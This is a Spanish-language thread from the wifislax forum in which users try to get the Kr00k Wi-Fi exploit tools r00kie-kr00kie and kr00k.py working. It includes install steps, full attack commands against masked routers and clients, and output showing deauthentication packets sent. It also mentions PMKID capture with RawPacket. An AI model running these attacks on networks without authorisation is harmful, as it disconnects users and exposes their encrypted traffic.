Seguridad Wireless - Wifi
Suite Seguridad Wireless => Live wifislax => Mensaje iniciado por: dynyly en 29-04-2020, 17:17 (Miércoles)
-
salu2
algien ha jugado con r00kie-kr00kie
al parecer explota la brecha kroot
he intentado pero a mi se queda como que funciona pero no recoge ...quizas no sepa usarlo como es debido
a lo mejor tengo que guardar captura pero ... no me entero mucho
instalacion y descarga de complementos necesarios
wget https://github.com/Legrandin/pycryptodome/archive/v3.9.7x/pycryptodome-3.9.7x.tar.gz
wget https://slackbuilds.org/slackbuilds/14.2/python/pycryptodomex.tar.gz
ls
tar xvfz pycryptodomex.tar.gz
cp pycryptodomex.tar.gz pycryptodome-3.9.7x.tar.gz pycryptodomex/
cd pycryptodomex/
installpkg /tmp/pycryptodomex-3.9.7-x86_64-1_SBo.tgz
cd
intalo scapy version necesaria
sudo pip install scapy==2.4.2
descarga rookie
git clone https://github.com/hexway/r00kie-kr00kie.git
cd r00kie-kr00kie
sudo pip3 install -r
lanzo rookie pero da muchas lineas de cazando pero no se algo va mal ¿no?
wifislax r00kie-kr00kie # ▌▌▌python3 r00kie-kr00kie.py -i wlan1 -b XXXXXX -c XXXXXX -l 11 -r /root/Desktop/pruebas.pcap
/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/
/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1
https://hexway.io/research/r00kie-kr00kie/
[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan1 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan1
[*] Send 5 deauth packets to: XXXXXX from: XXXXXXXXXX
[*] Send 5 deauth packets to: XXXXXX from: XXXXXXXXXX
----
otra cosa que he notado que la interfaz que usa es como que quedar en modo raro y networmanager como que lo deja tonto
airmon-ng start wlan1
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
alguna idea de hacerlo furrular como es debido
-
la brecha es asi , a mi tambien se me queda escaneando , pero si el router no es vulnerable , te comes los mocos, o si tu dispositivo ya esta parcheado (los moviles mas o meno supongo que se habran actualizado casi todos).
lo del networkmanager , es verdad , tienes que ir a hardware-tools , resetear wlan0 driver y reiniciar networkmanager ,esta todo en los menus ...
no has hecho nada mas ... la captura por cierto la guarda el solo automaticamente y cuando encuentra un paquete vulnerable te sale un mensaje , pero yo estube dale que te dale con el movil creando trafico y nada de nada , segun la nota explota routers con chips broadcom , y cypress ... asi que podria funcionar bajo un entorno MUY CONCRETO ..pero no por normal general.
en la iso de wifislax, al menos la de pruebas no hay que instalar nada de nada , funciona a pelo ..
-
salu2
no hice mas tube que hacer unos recados al poco ...
Bueno probando en un Tp-link , asus y huawei
a mi siempre me queda scaneando recogiendo y mandando deauhts
incluso he usado mi alfa que no suelo usar
pues las auditorias o te llega potencia o nada
pero vamos lo dicho comand
python3 r00kie-kr00kie.py -i wlan1 -b XXXXXX -c XXXXXX -l canal
si se dice que si es vulnerable ya se veria ...¿no?
no sabia que la rc4 lo tenia
-
salu2
no hice mas tube que hacer unos recados al poco ...
Bueno probando en un Tp-link , asus y huawei
a mi siempre me queda scaneando recogiendo y mandando deauhts
incluso he usado mi alfa que no suelo usar
pues las auditorias o te llega potencia o nada
pero vamos lo dicho comand
python3 r00kie-kr00kie.py -i wlan1 -b XXXXXX -c XXXXXX -l canal
si se dice que si es vulnerable ya se veria ...¿no?
no sabia que la rc4 lo tenia
no la rc4 no lo lleva, solo digo que no necesitas instalar nada , que trabaja del tiron ..
-
a mi me pasa lo mismo se queda escaneando y de ahi no sale ningun paquete recibido,
eso si lo he probado al hazar ninguno era vulnerable que yo sepa.
y como no uso networkmanager no tengo problemas con networkmanager
la captura la guarda solo y con otro programa la desencriptas
he intentado hacer funcionar el kr00ker que una vez que se asocia manda un mensaje que dice, tal es vulnerable to kr00k
pero me sale un error de python y aes scapy crypto noseke que no entiendo estoy en arreglarlo,
ayer iba al git de kr00ker a comentar el error pero tengo todas las cuentas de git anuladas otro dia sera.
usuario prueba kr00ker a ver si te va a pelo tambien, lleva poca cosa lo mismo que los otros scapy y criptomex poco mas.
en que nota explota routers con chips broadcom y cypress donde esta esa nota,
en routers yo tenia entendido solo asus y huawei, a no ser que esos lleven esos chips tanto no mire :P
saludos
pues ahora tampoco encuentro lo de broadcom y cypress, aun asi la nota decia que no habia problema que casi todos los routers montan chips broadcom ... yo no consigo nada de nada , mientras no vea que funciona , paso del tema.
cuando captura packetes legibles sale elmensaje , data krrok captured o algo asi en rojo ... mire algun video en youtube ...
mirare el otro que dice a ver ..
-
salu2
o la rc4 no lo lleva, solo digo que no necesitas instalar nada , que trabaja del tiron ..
no entiendo perdona
otra cosa quizas no se no se ....
al instalar los paquetes de phyton ¿no os da un warning al final ?
ahora que recuerdo
yo ya tengo python3 de otros xzm que lo requerian
voy a mirar otra vez lo de los warning porque yo he tirao a los en teoria vulnerables
asus , tplink y huawei
--
mu bueno eso de restear driver de interfac ya me habia fijado en la rc4 precisamente
pero en el momento uno prefiere hacerlo a mano ;D
-
salu2
o la rc4 no lo lleva, solo digo que no necesitas instalar nada , que trabaja del tiron ..
no entiendo perdona
otra cosa quizas no se no se ....
al instalar los paquetes de phyton ¿no os da un warning al final ?
ahora que recuerdo
yo ya tengo python3 de otros xzm que lo requerian
voy a mirar otra vez lo de los warning porque yo he tirao a los en teoria vulnerables
asus , tplink y huawei
--
mu bueno eso de restear driver de interfac ya me habia fijado en la rc4 precisamente
pero en el momento uno prefiere hacerlo a mano ;D
que no necesitas instalar dependencias , ... python3 ya esta en las isos, asi que si tu llevas un xzm , debes estar usando wifislax-1.0 antes de cristo.
-
el kr00ker , no me pide tampoco ninguna dependencia, pero tira un error indent , segun google, significa que el codigo , tiene algun problema , pero ni idea ni ganas de investigarlo tampoco.
jodder, hiba a ponerle un issue , para saber si la version de python3 , es lo que provoca el error o que ... pero github , ahora dice que mi password no es seguro y que lo resetee , y no me deja entrar y tampoco me da la ganar resetear el pass .. asi que que le den.
-
salu2
;D ;D ya tienes cosas mas importantes que esto ;D
no tengo ultima version estable pero bueno asi aprende uno a intalar
python3 ya seria algo que necesitaba porque si no lo habria hecho te hablo de memoria
--
me referia a los warning de al final de intalar crypto
usr/lib64/python2.7/site-packages/Cryptodome/__init__.pyi
WARNING: zero length file usr/lib64/python3.7/site-packages/Cryptodome/Cipher/__init__.pyi
WARNING: zero length file usr/lib64/python3.7/site-packages/Cryptodome/Hash/__init__.pyi
WARNING: zero length file usr/lib64/python3.7/site-packages/Cryptodome/PublicKey/__init__.pyi
WARNING: zero length file usr/lib64/python3.7/site-packages/Cryptodome/Math/__init__.py
WARNING: zero length file usr/lib64/python3.7/site-packages/Cryptodome/py.typed
WARNING: zero length file usr/lib64/python2.7/site-packages/Cryptodome/Cipher/__init__.pyi
WARNING: zero length file usr/lib64/python2.7/site-packages/Cryptodome/Hash/__init__.pyi
WARNING: zero length file usr/lib64/python2.7/site-packages/Cryptodome/PublicKey/__init__.pyi
WARNING: zero length file usr/lib64/python2.7/site-packages/Cryptodome/Math/__init__.py
WARNING: zero length file usr/lib64/python2.7/site-packages/Cryptodome/py.typed
Slackware package /tmp/pycryptodomex-3.9.7-x86_64-1_SBo.tgz created.
y me furrula parece se queda como hemos comentado
creo hacerlo bien
wget https://github.com/Legrandin/pycryptodome/archive/v3.9.7x/pycryptodome-3.9.7x.tar.gz
wget https://slackbuilds.org/slackbuilds/14.2/python/pycryptodomex.tar.gz
ls
tar xvfz pycryptodomex.tar.gz
cp pycryptodomex.tar.gz pycryptodome-3.9.7x.tar.gz pycryptodomex/
cd pycryptodomex/
./pycryptodomex.SlackBuild
installpkg /tmp/pycryptodomex-3.9.7-x86_64-1_SBo.tgz
----
pero bueno sera otra de esas que exageran
o que en españa no hay tales ....
A otras cosas gracias por las respuestas
-
A mi me sale el primero en la búsqueda de San Google:
https://www.welivesecurity.com/2020/02/26/krook-serious-vulnerability-affected-encryption-billion-wifi-devices/ (https://www.welivesecurity.com/2020/02/26/krook-serious-vulnerability-affected-encryption-billion-wifi-devices/)
Ahí dice lo del chipset Broadcom y Cypress... si no han sido parcheados.
-
ostias 19 megas ??
lo mirare a ver , por cierto , aunque hay una rc3 , ... me di cuenta que aun faltaban cosas de python , el mimtf no funcaba ... le añadi 3 o 4 creo ...
por lo de krook , el problema que veo es que hay 0 resultados ... para probar eta bien , pero no veo que de fruto ninguno esta vulnerabilidad ... o lo hacemos mal...jaja.
Estoy mirando , y ni hay package log ni na , y todo lo que veo de python ,ya lo lleva wifislax , ... netaddr , prettytable , pynaci , ... scapy ...
-
salu2
probada en wifislax
wifislax64 ~ # cat /etc/*-release
NAME=Wifislax64
VERSION="2.0"
ID=wifislax64
VERSION_ID=2.0
PRETTY_NAME="Wifislax64 2.0"
vamos la Wifislax64 2.0 rc1 me ha dao por ahi porque es la que tengo limpia las demas las tengo con modulos y queria hacerlo sobre live limpia
pero me da fallo krook sin embargo krokkie.py a mi sigue iguall
wifislax64 ~ # kr00k.py -i wlan1mon -t 10xxxxxxxx -c 6 --bssid 3C:xxxxxxxxx
[*] killing processes that could cause trouble. (airmon-ng check kill)
[*] initiating monitor mode
[*] switching to specified channel
[*] engaging
[+] 5 disassociation packets sent to: 10xxxxxxxxx from: 3C:xxxxxxxxxx
Traceback (most recent call last):
File "/usr/bin/kr00k.py", line 172, in <module>
main()
File "/usr/bin/kr00k.py", line 149, in main
kr00k.engage()
File "/usr/bin/kr00k.py", line 103, in engage
sniff(iface=self.interface, prn=self.decrypt)
File "/usr/lib64/python3.7/site-packages/scapy/sendrecv.py", line 972, in sniff
sniffer._run(*args, **kwargs)
File "/usr/lib64/python3.7/site-packages/scapy/sendrecv.py", line 925, in _run
session.on_packet_received(p)
File "/usr/lib64/python3.7/site-packages/scapy/sessions.py", line 47, in on_packet_received
result = self.prn(pkt)
File "/usr/bin/kr00k.py", line 54, in decrypt
qos = pkt[Dot11QoS]
File "/usr/lib64/python3.7/site-packages/scapy/packet.py", line 1171, in __getitem__
raise IndexError("Layer [%s] not found" % lname)
IndexError: Layer [Dot11QoS] not found
wifislax64 ~ # airmon-ng stop wlan1mon
sim emargo el otro se queda igual
r00kie-kr00kie.py -i wlan0 -c 10xxxxxxxxxx -l 6 -b 3Cxxxxxxxxxx
/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/
/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1
https://hexway.io/research/r00kie-kr00kie/
[!] Kill processes that prevent monitor mode!
[*] Set monitor mode on wireless interface: wlan0
[*] Set channel: 6 on wireless interface: wlan0
[*] Send 5 deauth packets to: 1xxxxxxxxxxxxxxx from: 3xxxxxxxxxxxxxxxx
[*] Send 5 deauth packets to: 10:xxxxxxxxxxxxx from: 3xxxxxxxxxxxxxxxx
[*] Send 5 deauth packets to: 10xxxxxxxxxxxxxx from: 3xxxxxxxxxxxxxx
[*] Send 5 deauth packets to: 10xxxxxxxxxxxxxx from: 3C:xxxxxxxxxxxxxx
tambien el Raw Packet Attack es un poco impreciso con las opciones
no escanea me sale una pantalla de kismet creo ...
y quedan las interaces en mon0 tras su salida
ya es agresivo despues de su uso que deja tonto networmananer
he tenido que reiciniar driver de interfaz con el script que hizo geminis de reiniciar driver para que quede bien
pondrias el enlace original pues yo solo descarge krookie no krook
Thanks
-
pues no se , algunos de python3 , no estaban en slackbuilds y los añadi yo , no llevan el tag "slackbuilds" , si no "wifislax"
pip3 list|grep scapy
scapy 2.4.3
el netaddr , no lo tengo en python3 ...
pip3 list|grep net
execnet 1.6.0
netifaces 0.10.9
el de slackbuilds es solo python2 , basta leer el script...
https://slackbuilds.org/slackbuilds/14.2/python/python-netaddr/python-netaddr.SlackBuild
tendria que mirar cuales son los que hacen falat y los que ya lleva la iso ...
-
salu2
probare cuando tenga tiempo
lo de dejar enlace original me refiero a que yo me descarge de este enlace
https://github.com/hexway/r00kie-kr00kie.git
y me descarga rookie-kr00kie mas traffic-generator
en el modulo dado veo que tiene uno llamado krook.py
lo has hecho tu y el Attack tool tambien ...
si ese el caso para dejar interface bien tras su uso en wifislax
primero demontar interfaz mon
/usr/bin/reset-iface wlan0
en esa misma direccion hay script que hizo geminis que reinicia drivers de interfaz para dejarlas bien esta bien echarle ojo a code
probare en otros momentos
-
Bueno , voy a ir desgranando , ya veo que si que algunos modulos python3 me hacen falta ... voy a ir ejecutando los archivos que hay en /usr/bin ..para saber cuales me faltan y crearlos y añadirlos a la iso ...por lo menos que probar sea mas facil despues.
buen curro te has pegao ..jajaja.
-
Bueno , voy a ir desgranando , ya veo que si que algunos modulos python3 me hacen falta ... voy a ir ejecutando los archivos que hay en /usr/bin ..para saber cuales me faltan y crearlos y añadirlos a la iso ...por lo menos que probar sea mas facil despues.
yo de ti haria un pip3 install todo y despues lo salvaria con
mksquashfs /mnt/live/memory/changes /mnt/save01.xzm
y ya lo tienes todo hasta lo que se instala en /usr/bin para incrustar en el modulo python que tienes en slackbuilds,
limpiando y dejando solo lo python claro.
ademas con pip los puedes instalar en masa
pip3 install lala lolo lulu lili mamas etc etc
ya he llegado un punto que me exigo un minimo ... cada cosa con su log , que si luego hay que actualizarlo se pueda facil o desinstalarlo ... con installpkg o removepkg .. , tampoco me supone un drama , tenemos una tool para pruebas rapidas ...
makefast
es un script que hicimos geminis_demon y yo , que haces "cd" , dentro de una carpeta de sources ..y el script detecta si es python , o perl .. o lo que sea ..lo compila y crea un paquete ... xzm o txz ,
makefast txz
la cosa esta en que si es python , ejecuta python install ..y despues python3 install ... los binarios seran python3 , y lo unico es abrirlos para eleiminar la parte de python2 que no nos hace falta o que ya estan de otro paquete.
el pip install , pip3 install ..estan bien para pruebas rapidas ... pero en la iso lo tengo todo con bastante orden ..sus logs de paquetes para casi todo ,,,, solo hay algunos ficheros que no van en log ..por que son configs de wifislax, que no van en ningun paquete.
He empaquetado estos y ya parece que no necesito mas.... 4 megas entre todos..
python3-npyscreen-4.10.5
python3-netaddr-0.7.19
python3-raw-packet-0.2.1
python3-getmac-0.8.2
python3-ipaddress-1.0.22
python3-xmltodict-0.12.0
-
salu2
donde dije digo
no se a mi kr00k.py debo usarlo en wlan0 una cu intel mas vieja y montandola en modo monitor con airmon-ng-old
pero se queda igual que krookie.py mandado deauhts
y RawPaket ayer con una alfa vieja tambien nada
hoy me da por enchufar la antena belkin y RawPaket escanea y coge PMKID pero creo que RawPaket sin las otras herramientas que tiene pues es una navaja suiza de phython interesante ...
este solo extrae pmkid y los guarda en texto
RawPacket es el que de verdad me deja tonta la iface networmanagert no se ...
lo dicho para que hagan pruebas y vean que esto es una vulnerabilidad parcheada o exagerada ...